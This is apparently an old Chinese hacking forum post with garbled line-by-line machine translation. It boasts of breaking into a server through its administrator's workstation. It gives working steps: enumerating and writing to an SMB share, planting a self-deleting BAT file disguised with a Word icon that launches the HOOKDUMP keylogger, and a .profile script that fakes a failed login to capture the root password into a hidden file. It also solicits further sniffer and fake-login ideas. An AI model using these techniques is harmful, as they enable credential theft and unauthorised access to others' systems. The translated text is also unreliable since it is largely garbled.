A very strange way to host invasion

ru0chen@263.net

我这次谈一种很奇特的入侵主机的方法，这种方法目前咱还没在什么书籍上看过，我要申请专利的哟。 I talk about this invasion of the host a very strange way, this method is currently not in what we read books, I want to apply for a patent yo.

Once upon a time，我发现了一个网站，于是常规入侵。 Once upon a time, I found a website, so conventional invasion. 很好，它的FINGER开着，于是我编了一个SHELL，从aaa帐号试到zzz（bye the way，这是我发现的一个网上规律，那就是帐号的长度与口令的强度成正比，如果一个帐号只有两三位长，那它的口令一般也很简单，反之亦然，故且称之为若氏定理吧），结果一个帐号也不存在，我没有再试它的帐号。 Well, it's FINGER open, so I made up a SHELL, aaa account from trial to zzz (bye the way, this is one I found online law that account is proportional to the strength of the password length, if a account only twenty-three long, that it is generally very simple password, and vice versa, it is called, and if it's Theorem), the results of an account does not exist, I did not try it the account. 因为我被它开的端口吸引住了，它开着WWW，我就不信它不出错。 Because I am attracted by its port open, it open WWW, I do not believe it is not wrong. 一连拿了五种CGI和WWW扫描器总计扫了三四百种常见错误它几乎都不存在，我KAO，I服了YOU！ Series took a total of five kinds of CGI and WWW scanners sweep the three or four hundred kinds of common errors it almost does not exist, I KAO, I served YOU! 也有几个错误，我不知道如何利用，算了。 There are also several errors, I do not know how to use, forget it. 又绕着主机转了几圈，象狐狸遇见刺猬，无从下嘴。 And turn a few laps around the host, like the fox met a hedgehog, no under the mouth.

还是看看root的信息吧：finger root@xxx.xxx.xxx Information or to see the root it: finger root@xxx.xxx.xxx
Login name: root In real life: system PRIVILEGED account Login name: root In real life: system PRIVILEGED account
Directory: / Shell: /bin/sh Directory: / Shell: / bin / sh
Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx
No Plan. No Plan.

root经常来，那个202.xx.xx.xx就是他用的工作站了，从那会不会看到点东西呢？ often to the root, that is, he 202.xx.xx.xx workstations, and from that point will not see things?
net view \\202.xx.xx.xx net view \ \ 202.xx.xx.xx
Shared resources at \\202.xx.xx.xx Shared resources at \ \ 202.xx.xx.xx

Sharename Type Comment Sharename Type Comment

x x
x x
我的公文包Disk My briefcase Disk
The command was completed successfully. The command was completed successfully.

在上网的机器上开着WINDOWS的“文件和打印机共享”的服务，是很多人容易掉以轻心的，这个root没有例外。 Open access on the machine in the WINDOWS "File and Printer Sharing" service, is that many people tend to be taken lightly, this root is no exception. 如果它的C盘共享了而且可写那就好了，但那是做梦，现在开了共享的目录没有一个是根目录，连D驱的都没有，别着急，慢慢来。 If it's C drive shared and can write it well, but that is a dream, now open the shared directory is not a root, not even the D drive, do not worry, take your time. x掉的那些文件夹都没用，不能写，里面尽是些英文原著，这个root还挺行的。 x out of those folders did not use, can not write, which is full of some of the English original, the root pretty line. “我的公文包”吸引了我的注意，这是一个用于将不同的机器上的资料进行同步的工具，很显然这个root要经常更新主机上的主页，有时候在自己的机器上编，有时候在主机上编……所以很重要的一点：“我的公文包”的共享一般都是可写的！ "My Briefcase" to attract my attention, this is a different machine is used to synchronize the information on the tools, it is clear that the root on the host to regularly update the home page, sometimes in their own machine code, Sometimes the host code ... so very important point: "My Briefcase" shared generally can write!
那我再进去看看。 Then I went to see again.
>net use i: \\202.xx.xx.xx > Net use i: \ \ 202.xx.xx.xx
>i: > I:
>echo asdf>temp.txt > Echo asdf> temp.txt
不错，确实可写 Yes, indeed can write
>del temp.txt > Del temp.txt
不留痕迹——黑客的习惯 Leave No Trace - the habit of hacking
>dir/od/p > Dir / od / p
看看都有些什么……倒数第二排那个是什么？ To see what's there ... ... what is the penultimate row that? “X月工作计划.doc”！ "X month work plan. Doc"! 就是它了，即然是计划就不可能写完了就丢一边，它肯定会再次打开它的——至少下个月写计划时要COPY一下:-> That's it, now that is impossible to finish a plan to throw aside, it certainly would open it again - at least when writing the plan next month to COPY this: ->
该动手了，我的目标就是让它下次打开时误中我的陷阱而运行我藏的木马。 The hands-on, and my goal is to make it next time you open the trap and error, I run my possession of the horse. 我这次用的是一个键盘计录软件HOOKDUMP，我觉得它挺好的，价钱实惠，量也足……对不起，说习惯了，应该是它不仅记录下全部击键，还记录下打开或关掉了什么程序、按过什么按纽、用过什么菜单……总之，它的记录让你就和你站在他身后看他操作计算机一样详细了。 I used this account is a keyboard recording software HOOKDUMP, I think it is very good, price reasonable, the amount is enough ... ... I'm sorry, that used to it, should not only record all the keystrokes, but also record on or off out the procedure, according to what button, used what the menu ... ... In short, it allows you to record and watch you stand behind him as he detailed the operation of the computer. 您要问那么多木马你为啥装这个？ You have to ask you why so many Trojans install this? 要知道无论是中国的冰河、netspy还是外国的netbus、BO，都被各种杀毒软件列为头号侦查对象，而一个root的机器上可不可能没装杀毒软件？ To know whether it is China's glaciers, netspy or foreign netbus, BO, have been investigating a variety of objects as the number one anti-virus software, and a root of the machine can not install anti-virus software can not? 还是HOOKDUMP好，小小的，不起眼，不过如果大家都用只怕我再用它的机会就少了…… Or HOOKDUMP good, small, inconspicuous, but if you are using and then I'm afraid I have less chance of it ... ...
>copy hookdump.* i: > Copy hookdump .* i:
补充一点：上传前先编好它的hookdump.ini文件，置为隐藏方式运行，不然root一运行屏幕上蹦出一大窗口可就溴大了。 Add this: a good first series before uploading it hookdump.ini file, run home to hide, or run the root a large window on the screen may pop out a big bromine.
然后再在自己的机器上编一个同名的BAT文件：X月工作计划.BAT Then in his machine the same name compiled a BAT file: X on the work plan. BAT
>edit c:\X月工作计划.BAT > Edit c: \ X on the work plan. BAT
@echo off @ Echo off
hookdump hookdump
attrib -h X月工作计划.doc attrib-h X on the work plan. doc
c:\progra~1\micros~1\office\winword X月工作计划.doc c: \ progra ~ 1 \ micros ~ 1 \ office \ winword X on the work plan. doc
attrib -h temp.bat attrib-h temp.bat
del temp.pif del temp.pif
del temp.bat del temp.bat
看明白了吧？ To see to understand, right? root运行了这个BAT文件实际上就是先运行木马，再调用WINWORD文件打开它想开的这个文件，然后自我删除，也许它机器上WINWORD的位置不同，那调用就会失败，不过不要紧，反正BAT会马上删除，他会以为是自己的误操作。 root to run this BAT file is actually the first run a Trojan horse, and then call WINWORD file to open it to open the file, then delete itself, perhaps it WINWORD different positions on the machine, that call will fail, but it does not matter, anyway, BAT will immediately removed, he thought it was their mistake.
这时你的C驱根目录就有了这么一个BAT文件，它是一个方形的图标，和那个WORD文件大相径庭，root怎么会运行它呢？ Then the root directory of your C drive so there is a BAT file, which is a square icon, and that WORD documents differ, root how can run it? 没关系，在这个文件上点右键，点属性，在“程序”栏选“更改图标”不就行了吗？ It does not matter, right click on this file, point attributes, in the "Program" column choose "Change Icon" is not on line yet? WORD的图标在你机器c:\progra~1\micros~1\offic中。 WORD icon on your machine c: \ progra ~ 1 \ micros ~ 1 \ offic in. 还要将“运行”改为“最小化”，“退出时关闭”打上勾，这样才能保证在运行时一点迹象也没有。 But also the "Run" to "minimize", "Close on Exit" check mark, so as to ensure that signs do not run. 事实上这个BAT文件变成了两个，还有一个PIF文件就是它的图标。 In fact, this BAT file into two, there is a PIF file is its icon.
把这两个文件传上去： Pass up these two files:
>copy X月工作计划.bat i: > Copy X month work plan. Bat i:
>copy X月工作计划.pif i: > Copy X month work plan. Pif i:
然后把它的文件和自己的文件都藏起来： Files and then put it to hide their files:
>attrib +h X月工作计划.doc > Attrib + h X on the work plan. Doc
>attrib +h X月工作计划.bat > Attrib + h X on the work plan. Bat
这样，root的“公文包”里只剩下一个和原来一模一样的WORD图标，他做梦也没想到这已变成了一个BAT文件。 This, root of the "briefcase" where only one identical WORD icon and the original, he never dreamed that this has become a BAT file. 然后可以喘口气了，让我们静静的等…… Then take a breath, let us quietly and so on ... ...


几天后，我进入这个工作站，取下记录下来的击键记录，找出root的口令，进入主机。 A few days later, I entered the station, remove the recorded keystrokes to find out the root password, enter the host.

看明白了吗？ To see to understand it? 这种入侵方法就是对那些铜墙铁壁的主机不是强往里冲而是查操作该主机的root所使用的机器，那是他的“座机”，“舒适”才是他想要的，因此强度也就大大减小。 This invasion is to host those impregnable red but not strong search operations inside the root of the host machine you are using, it is his "plane", "comfortable" is what he wants, so the intensity will greatly reduced. 进入他的“座机”后跟踪他的操作，不就轻易的获得钥匙了吗？ Into his "plane" to track him after the operation, do not easily get the key on it? 顺便说一下，其实那个“我的公文包”文件夹的共享是加了口令的，我另费了一番周折才进去，不过这和入侵方式无关，我下回再讲怎么进有口令的共享文件夹。 By the way, in fact, that "My Briefcase" folder sharing is added a password, I also spent a lot of twists and turns it into, but this has nothing to do and intrusion methods, revisit next time I enter a password to share how the folder.

好了，看在我敲得手指发麻的份上，您也该回答我一个问题了： Well, knock me to see fingers were numb, you should also answered my questions:
条件：已获得某主机的rootshell，假设名为.fool (-rwsr-xr-x 1 root system 131072 .fool) Condition: has been a host of rootshell, assumed name. Fool (-rwsr-xr-x 1 root system 131072. Fool)
目标：获得该主机root的帐号提示：方法一:即然已是root，可以装一个sniffer，嗅探口令，不过主机是Digital 4.0B，常见的esniff，dsniff，sniffit都不能运行，你再推荐一个？ Goal: to obtain an account of the host root tips: Method One: Now that is root, you can install a sniffer, password sniffer, but the host is the Digital 4.0B, common esniff, dsniff, sniffit can not run, you then recommend a ?
方法二：做一个假LOGIN的SHELL，将原LOGIN程序改名，收集了帐号的口令后调用真的LOGIN程序，但我发现LOGIN程序一旦改名就不能运行了！ Method two: make a fake LOGIN of SHELL, renamed the original LOGIN program, a collection of the account password after LOGIN procedure call really, but I found that once renamed LOGIN program can not run!
方法三：在root的HOME目录中改它的.profile如下： Method three: root's HOME directory to change it. Profile is as follows:
clear clear
echo echo
echo echo
echo "Digital UNIX (lwh000) (ttyp0)" echo "Digital UNIX (lwh000) (ttyp0)"
echo echo
echo "login:root" echo "login: root"
echo "Password:" echo "Password:"
echo "Login incorrect" echo "Login incorrect"
echo "login:\c" echo "login: \ c"
read lgin read lgin
stty -echo stty-echo
echo "Password:\c" echo "Password: \ c"
read pw read pw
stty echo stty echo
echo "Login:$lgin - Pword:$pw" >>/tmp/.autobk echo "Login: $ lgin - Pword: $ pw">> / tmp / .autobk
echo echo
echo "Last login: Tue Jul 18 11:05:25 from pa1002" echo "Last login: Tue Jul 18 11:05:25 from pa1002"
echo echo
echo "Digital UNIX V4.0B (Rev. 564); Sat Mar 18 11:02:04 CST 2000" echo "Digital UNIX V4.0B (Rev. 564); Sat Mar 18 11:02:04 CST 2000"
# 中间这一段太长，就不写了，实际上就是伪装主机的欢迎词 # The middle of this period is too long, do not write, in fact, disguised host of Welcome
echo echo
echo echo
# 这以下是root的原.profile # This following is the original root. Profile
PATH=$HOME/bin:${PATH:-/usr/bin:.} PATH = $ HOME / bin: $ {PATH: -/usr/bin:.}
export PATH export PATH
if [ ! "$DT" ]; then if [! "$ DT"]; then
stty dec stty dec
tset -I -Q tset-I-Q
fi fi
看出来没，实际上root正确登录后，第一句clear擦掉欢迎词，然后伪写登录不成功，让他再输一次，然后记录下来，再伪写上欢迎词，执行正常的.profile内容。 Did not see it, in fact, the correct root login, the first one clear wipe greeting, and then write pseudo-log unsuccessful, let him lose once, then recorded, and then write the pseudo-welcome speech, the normal. Profile content.
但是TELNET反应是较慢的，第一句clear再快也能看出屏幕有一个闪烁，细心的root也许会留意，如果能关掉UNIX的欢迎词就好了，怎么做？ But the TELNET response is slower, the first one and then quickly clear the screen can also be seen to have a flash, the root may be careful to note that if you can turn off the welcome words like UNIX, how to do?
当然，只要能达成目标，您尽可以提出您的方法，不要拘泥于我想的这几种。 Of course, the goal can be reached as long as you do can make your way, do not stick I think these types.